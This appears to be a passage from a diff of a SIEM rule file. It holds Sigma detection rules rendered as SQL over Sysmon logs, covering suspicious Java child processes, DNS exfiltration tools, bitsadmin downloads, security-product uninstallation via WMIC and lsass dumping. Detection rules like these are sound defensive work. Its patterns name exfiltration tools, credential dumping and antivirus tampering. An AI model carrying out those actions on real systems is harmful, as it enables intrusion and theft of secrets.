Java host process (e.g. log4j exploitation)", + "author": "Andreas Hunkeler (@Karneades), Florian Roth", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Legitimate processes that run at logon. Filter according to your environment" + "Legitimate calls to system binaries", + "Company specific internal usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' AND (Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE 
'\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_schedule_type.yml" + "filename": "proc_creation_win_java_susp_child_process.yml" }, { - "title": "DNS Exfiltration and Tunneling Tools Execution", - "id": "98a96a5a-64a0-4c42-92c5-489da3866cb0", + "title": "MpiExec Lolbin", + "id": "729ce0ea-5d8f-4769-9762-e35de441586d", "status": "test", - "description": "Well-known DNS Exfiltration tools execution", - "author": "Daniil Yugoslavskiy, oscd.community", + "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048.001", - "attack.command_and_control", - "attack.t1071.004", - "attack.t1132.001" + "attack.execution", + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\iodine.exe' ESCAPE '\\' OR Image LIKE '%\\\\dnscat2%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mpiexec.exe' ESCAPE '\\' OR Imphash = 'd8b52ef6aaa3a81501bdfff9dbb96217' OR Hashes LIKE '%IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217%' ESCAPE '\\') AND (CommandLine LIKE '% /n 1 %' ESCAPE '\\' OR CommandLine LIKE '% -n 1 %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml" + "filename": "proc_creation_win_lolbin_mpiexec.yml" }, { - "title": "File With Suspicious Extension Downloaded Via Bitsadmin", - "id": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", + "title": 
"Potential Tampering With RDP Related Registry Keys Via Reg.EXE", + "id": "0d5675be-bc88-4172-86d3-1e96a4476536", "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of \"reg.exe\" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' values", + "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.lateral_movement", + "attack.t1021.001", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.asax%' ESCAPE '\\' OR CommandLine LIKE '%.ashx%' ESCAPE '\\' OR CommandLine LIKE '%.asmx%' ESCAPE '\\' OR CommandLine LIKE '%.asp%' ESCAPE '\\' OR CommandLine LIKE '%.aspx%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cfm%' ESCAPE '\\' OR CommandLine LIKE '%.cgi%' ESCAPE '\\' OR CommandLine LIKE '%.chm%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jsp%' ESCAPE '\\' OR CommandLine LIKE '%.jspx%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.psm1%' ESCAPE '\\' OR CommandLine LIKE '%.scf%' ESCAPE '\\' OR CommandLine LIKE '%.sct%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\' OR CommandLine LIKE 
'%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.war%' ESCAPE '\\' OR CommandLine LIKE '%.wsf%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.rar%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\Terminal Server%' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD%' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')) AND ((CommandLine LIKE '%Licensing Core%' ESCAPE '\\' AND CommandLine LIKE '%EnableConcurrentSessions%' ESCAPE '\\') OR (CommandLine LIKE '%WinStations\\\\RDP-Tcp%' ESCAPE '\\' OR CommandLine LIKE '%MaxInstanceCount%' ESCAPE '\\' OR CommandLine LIKE '%fEnableWinStation%' ESCAPE '\\' OR CommandLine LIKE '%TSUserEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSAppCompat%' ESCAPE '\\' OR CommandLine LIKE '%IdleWinStationPoolCount%' ESCAPE '\\' OR CommandLine LIKE '%TSAdvertise%' ESCAPE '\\' OR CommandLine LIKE '%AllowTSConnections%' ESCAPE '\\' OR CommandLine LIKE '%fSingleSessionPerUser%' ESCAPE '\\' OR CommandLine LIKE '%fDenyTSConnections%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_bitsadmin_download_susp_extensions.yml" + "filename": "proc_creation_win_reg_rdp_keys_tamper.yml" }, { - "title": "Logon Scripts (UserInitMprLogonScript)", - "id": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", + "title": "Regsvr32 Flags Anomaly", + "id": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", "status": "test", - "description": "Detects creation or execution of UserInitMprLogonScript persistence method", - "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", + "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without 
using a /n flag at the same time", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1037.001", - "attack.persistence" + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ - "Exclude legitimate logon scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%UserInitMprLogonScript%' ESCAPE '\\' OR (ParentImage LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%netlogon%.bat%' ESCAPE '\\' OR CommandLine LIKE '%UsrLogon.cmd%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\WINDOWS\\\\Explorer.EXE%' ESCAPE '\\') OR (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\proquota.exe' ESCAPE '\\' OR Image LIKE '%\\\\Citrix\\\\System32\\\\icast.exe' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '% /i:%' ESCAPE '\\') AND NOT (CommandLine LIKE '% /n %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_persistence_userinitmprlogonscript.yml" + "filename": "proc_creation_win_regsvr32_flags_anomaly.yml" }, { - "title": "VMToolsd Suspicious Child Process", - "id": "5687f942-867b-4578-ade7-1e341c46e99a", + "title": "Regsvr32 Spawning Explorer", + "id": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", "status": "experimental", - "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", - "author": "behops, Bhabesh Raj", + "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.", + "author": "elhoim", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1059" + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ - "Legitimate use by administrator" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'RUNDLL32.EXE', 'REGSVR32.EXE', 'wscript.exe', 'cscript.exe'))) AND NOT ((CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweron-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweroff-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\resume-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\suspend-vm-default.bat%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_vmware_vmtoolsd_susp_child_process.yml" + "filename": "proc_creation_win_regsvr32_spawn_explorer.yml" }, { - "title": "Wusa Extracting Cab Files From Suspicious Paths", - "id": "c74c0390-3e20-41fd-a69a-128f0275a5ea", - "status": "experimental", - "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument from suspicious paths", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Tampering With Security Products Via WMIC", + "id": "847d5ff3-8a31-4737-a970-aeae8fe21765", + "status": "test", + "description": "Detects uninstallation or termination of security products using the WMIC utility", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + 
"attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administration" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%product where %' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/nointeractive%' ESCAPE '\\') OR (CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%caption like %' ESCAPE '\\' AND (CommandLine LIKE '%call delete%' ESCAPE '\\' OR CommandLine LIKE '%call terminate%' ESCAPE '\\')) OR (CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%where %' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%carbon\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%cylance\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%endpoint\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%eset\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%malware\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Sophos\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%symantec\\%%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG %' ESCAPE '\\' OR CommandLine LIKE '%Carbon Black%' ESCAPE '\\' OR CommandLine LIKE '%CarbonBlack%' ESCAPE '\\' OR CommandLine LIKE '%Cb Defense Sensor 64-bit%' ESCAPE '\\' OR CommandLine LIKE '%Crowdstrike Sensor%' ESCAPE '\\' OR CommandLine LIKE 
'%Cylance %' ESCAPE '\\' OR CommandLine LIKE '%Dell Threat Defense%' ESCAPE '\\' OR CommandLine LIKE '%DLP Endpoint%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Detection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Protection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Security%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Sensor%' ESCAPE '\\' OR CommandLine LIKE '%ESET File Security%' ESCAPE '\\' OR CommandLine LIKE '%LogRhythm System Monitor Service%' ESCAPE '\\' OR CommandLine LIKE '%Malwarebytes%' ESCAPE '\\' OR CommandLine LIKE '%McAfee Agent%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft Security Client%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Anti-Virus%' ESCAPE '\\' OR CommandLine LIKE '%Sophos AutoUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Credential Store%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Console%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Database%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Server%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Remote Management System%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Update Manager%' ESCAPE '\\' OR CommandLine LIKE '%Threat Protection%' ESCAPE '\\' OR CommandLine LIKE '%VirusScan%' ESCAPE '\\' OR CommandLine LIKE '%Webroot SecureAnywhere%' ESCAPE '\\' OR CommandLine LIKE '%Windows Defender%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml" + "filename": "proc_creation_win_wmic_uninstall_security_products.yml" }, { - "title": "Service DACL Abuse To Hide Services Via Sc.EXE", - "id": "a537cfc3-4297-4789-92b5-345bfd845ad0", + "title": "Renamed Sysinternals Sdelete Execution", + "id": "c1d867fe-8d95-4487-aab4-e53f2d339f90", "status": "experimental", - "description": "Detects usage of the \"sc.exe\" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.", - "author": "Andreas Hunkeler (@Karneades)", + "description": "Detects the use of a renamed 
SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.impact", + "attack.t1485" + ], + "falsepositives": [ + "System administrator usage" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'sdelete.exe' AND NOT ((Image LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete64.exe' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_renamed_sysinternals_sdelete.yml" + }, + { + "title": "Renamed CreateDump Utility Execution", + "id": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", + "status": "experimental", + "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Command lines that use the same flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\' OR (CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -f %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') OR (CommandLine LIKE '% --full %' ESCAPE '\\' AND CommandLine LIKE '% --name %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\createdump.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_sdset_hide_sevices.yml" + "filename": 
"proc_creation_win_renamed_createdump.yml" }, { - "title": "Suspicious Rundll32 Execution With Image Extension", - "id": "4aa6040b-3f28-44e3-a769-9208e5feb5ec", + "title": "Disabled RestrictedAdminMode For RDS - ProcCreation", + "id": "28ac00d6-22d9-4a3c-927f-bbd770104573", "status": "experimental", - "description": "Detects the execution of Rundll32.exe with DLL files masquerading as image files", - "author": "Hieu Tran", + "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.exe') AND (CommandLine LIKE '%.bmp%' ESCAPE '\\' OR CommandLine LIKE '%.cr2%' ESCAPE '\\' OR CommandLine LIKE '%.eps%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.ico%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.nef%' ESCAPE '\\' OR CommandLine LIKE '%.orf%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.raw%' ESCAPE '\\' OR CommandLine LIKE '%.sr2%' ESCAPE '\\' OR CommandLine LIKE '%.tif%' ESCAPE '\\' OR CommandLine LIKE '%.tiff%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\%' ESCAPE '\\' AND CommandLine LIKE '%DisableRestrictedAdmin%' ESCAPE '\\' AND CommandLine LIKE '% 1%' 
ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_susp_execution_with_image_extension.yml" + "filename": "proc_creation_win_reg_lsa_disable_restricted_admin.yml" }, { - "title": "HackTool - XORDump Execution", - "id": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", - "status": "test", - "description": "Detects suspicious use of XORDump process memory dumping utility", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious File Execution From Internet Hosted WebDav Share", + "id": "f0507c0f-a3a2-40f5-acc6-7f543c334993", + "status": "experimental", + "description": "Detects the execution of the \"net use\" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Another tool that uses the command line switches of XORdump" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\xordump.exe' ESCAPE '\\' OR (CommandLine LIKE '% -process lsass.exe %' ESCAPE '\\' OR CommandLine LIKE '% -m comsvcs %' ESCAPE '\\' OR CommandLine LIKE '% -m dbghelp %' ESCAPE '\\' OR CommandLine LIKE '% -m dbgcore %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe%' ESCAPE '\\' OR OriginalFileName = 'Cmd.EXE') AND (CommandLine LIKE '% net use http%' ESCAPE '\\' AND CommandLine LIKE '%& start /b %' ESCAPE '\\' AND CommandLine LIKE '%\\\\DavWWWRoot\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' OR CommandLine LIKE '%.dll %' ESCAPE '\\' OR CommandLine LIKE '%.bat %' ESCAPE '\\' OR CommandLine LIKE '%.vbs %' ESCAPE '\\' OR CommandLine LIKE '%.ps1 %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_xordump.yml" + 
"filename": "proc_creation_win_cmd_net_use_and_exec_combo.yml" }, { - "title": "Potential RDP Tunneling Via SSH", - "id": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", + "title": "Potential Data Stealing Via Chromium Headless Debugging", + "id": "3e8207c5-fcd2-4ea6-9418-15d45b4890e4", "status": "experimental", - "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", + "description": "Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.credential_access", + "attack.t1185" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%--remote-debugging-%' ESCAPE '\\' AND CommandLine LIKE '%--user-data-dir%' ESCAPE '\\' AND CommandLine LIKE '%--headless%' ESCAPE '\\')" ], - "filename": "proc_creation_win_ssh_rdp_tunneling.yml" + "filename": "proc_creation_win_browsers_chromium_headless_debugging.yml" }, { - "title": "Visual Basic Command Line Compiler Usage", - "id": "7b10f171-7f04-47c7-9fa2-5be43c76e535", - "status": "test", - "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "title": "Potential Rundll32 Execution With DLL Stored In ADS", + "id": "9248c7e1-2bf3-4661-a22c-600a8040b446", + "status": "experimental", + "description": "Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream 
(ADS).", + "author": "Harjot Singh, '@cyb3rjy0t'", "tags": [ "attack.defense_evasion", - "attack.t1027.004" + "attack.t1564.004" ], "falsepositives": [ - "Utilization of this tool should not be seen in enterprise environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\vbc.exe' ESCAPE '\\' AND Image LIKE '%\\\\cvtres.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine REGEXP '[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? \\S+?\\w:\\S+?:')" ], - "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml" + "filename": "proc_creation_win_rundll32_ads_stored_dll_execution.yml" }, { - "title": "EvilNum APT Golden Chickens Deployment Via OCX Files", - "id": "8acf3cfa-1e8c-4099-83de-a0c4038e18f0", + "title": "Execution in Outlook Temp Folder", + "id": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", "status": "test", - "description": "Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report", + "description": "Detects a suspicious program execution in Outlook temp folder", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%regsvr32%' ESCAPE '\\' AND CommandLine LIKE '%/s%' ESCAPE '\\' AND CommandLine LIKE '%/i%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.ocx%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 
'%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_evilnum_jul20.yml" + "filename": "proc_creation_win_office_outlook_execution_from_temp.yml" }, { - "title": "Conti Volume Shadow Listing", - "id": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", + "title": "Suspicious Hacktool Execution - PE Metadata", + "id": "37c1333a-a0db-48be-b64b-7393b2386e3b", + "status": "experimental", + "description": "Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Company = 'Cube0x0')" + ], + "filename": "proc_creation_win_hktl_execution_via_pe_metadata.yml" + }, + { + "title": "Exploiting SetupComplete.cmd CVE-2019-1378", + "id": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", "status": "test", - "description": "Detects a command used by conti to find volume shadow backups", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in 